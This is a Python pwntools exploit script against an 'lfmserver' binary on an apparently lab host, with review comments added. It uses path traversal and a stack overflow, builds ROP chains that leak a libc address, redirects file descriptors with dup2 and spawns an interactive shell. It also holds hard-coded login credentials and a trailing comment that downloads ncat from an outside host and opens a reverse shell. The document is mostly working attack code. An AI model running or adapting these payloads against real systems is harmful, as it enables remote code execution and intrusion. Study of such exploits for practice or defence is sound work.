- #!/usr/bin/env python3 -B -u
- #-*- coding: utf-8 -*-
- import sys
- from pwn import *
- context.arch = "amd64"
- # context.log_level = "error" # "debug"
def encode(ss):
    """Percent-encode every element of *ss* as a two-digit ``%xx`` group.

    Each element is formatted as a zero-padded, lowercase hex byte with a
    leading ``%``; the groups are concatenated with no separator.  Elements
    are expected to be ints (e.g. iterating a ``bytes`` object); anything
    that does not support the ``x`` format code raises ``ValueError``.
    """
    groups = [f"%{byte:02x}" for byte in ss]
    return "".join(groups)
if __name__ == "__main__":
    # NOTE(review): proof-of-concept exploit script for the "lfmserver"
    # binary on a lab host (IP/port below). Two connections are made: the
    # first sends a crafted CHECK request and reads a 6-byte pointer back
    # out of the response, the second sends a longer chain that reuses that
    # leak. Every numeric constant is hard-coded for one build of the binary
    # and of libc-2.28 -- the commented-out lines show the symbolic lookups
    # (bin.got / bin.plt / libc.symbols) they replaced -- so the script is
    # not portable and fails on any other build.
    # Defensive reading of what the request shape implies about the server:
    # it percent-decodes the path and evidently honours "%2e%2e%2f" ("../")
    # segments, it evidently reads past a NUL plus N bytes of padding (a
    # length check on the decoded path would stop that), and the fixed
    # 0x40xxxx addresses suggest a non-PIE build. Canonicalising the decoded
    # path before use, bounding the copy, and building with PIE and stack
    # protector would each break this chain.
    fd,N = 6,106
    IP,PORT = "10.10.10.173",8888
    r = remote(IP,PORT)
    usrname = "lfmserver_user"
    passwd = "!gby0l0r0ck$$!"
    # `hash` here and `bin` below shadow Python builtins; harmless in this
    # script but worth renaming.
    hash = "26ab0db90d72e28ad0ba1e22ee510510"
    preamble = ("%2e%2e%2f"*5) + "%2e%2e/proc/sys/kernel/randomize_va_space%x00" + ("A"*N)
    bin = ELF("./lfmserver")
    # The ELF object is only used by the commented-out symbolic line below;
    # the live line substitutes the resolved numbers.
    # payload = p64(0x405c4b) + p64(fd) + p64(0x405c49) + p64(bin.got["dup2"]) + p64(0) + p64(0x40251f) + p64(bin.plt["write"])
    payload = p64(0x405c4b) + p64(fd) + p64(0x405c49) + p64(4231200) + p64(0) + p64(0x40251f) + p64(4203552)
    req = "CHECK /{} LFM\r\nUser={}\r\nPassword={}\r\n\r\n{}\n".format(preamble+encode(payload),usrname,passwd,hash)
    r.sendline(req)
    libc = ELF("./libc-2.28.so")
    # Take bytes 1..6 of the fifth response line as the leaked pointer and
    # zero-extend it to 8 bytes before unpacking.
    leak = r.recvall().split(b"\n")[4][1:7]
    leak = u64(leak.ljust(8,b"\x00"))
    # libc.address = leak - libc.symbols["dup2"]
    # 1091264 is the hard-coded stand-in for the libc.symbols["dup2"] lookup
    # in the commented-out line above; the `libc` ELF object is otherwise
    # unused.
    libc_addr = leak - 1091264
    log.info("base(libc) @ 0x%08x"%libc_addr)
    r.close()
    r = remote(IP,PORT)
    # Second request: the chain is assembled piecewise. The three
    # commented-out bin.plt["dup2"] lines mark where 4202560 was substituted.
    payload = p64(0x405c4b)
    payload += p64(fd)
    payload += p64(0x405c49)
    payload += p64(0x0)
    payload += p64(0x0)
    # payload += p64(bin.plt["dup2"])
    payload += p64(4202560)
    payload += p64(0x405c4b)
    payload += p64(fd)
    payload += p64(0x405c49)
    payload += p64(0x1)
    payload += p64(0x0)
    # payload += p64(bin.plt["dup2"])
    payload += p64(4202560)
    payload += p64(0x405c4b)
    payload += p64(fd)
    payload += p64(0x405c49)
    payload += p64(0x2)
    payload += p64(0x0)
    # payload += p64(bin.plt["dup2"])
    payload += p64(4202560)
    # Final chain; the commented-out line directly above the live one is its
    # symbolic form, with libc_addr standing in for libc.address.
    # rop = payload + p64(poprdi) + p64(1) + p64(poprsi) + p64(bin.got["dup2"]) + p64(0) + p64(ropnop) + p64(bin.plt["write"]) + p64(ropnop) + p64(libc.address + 0x501e3)
    rop = payload + p64(0x405c4b) + p64(1) + p64(0x405c49) + p64(4231200) + p64(0) + p64(0x40251f) + p64(4203552) + p64(0x40251f) + p64(libc_addr+0x501e3)
    # Same preamble and request template as the first connection.
    preamble = ("%2e%2e%2f"*5) + "%2e%2e/proc/sys/kernel/randomize_va_space%x00" + ("A"*N)
    req = "CHECK /{} LFM\r\nUser={}\r\nPassword={}\r\n\r\n{}\n".format(preamble+encode(rop),usrname,passwd,hash)
    r.sendline(req)
    r.interactive()
- # wget http://10.10.16.213:8000/ncat -O /tmp/nc && chmod 0775 /tmp/nc && /tmp/nc 10.10.16.213 1337 -e /bin/sh
- # python -c "import pty; pty.spawn(\"/bin/bash\")"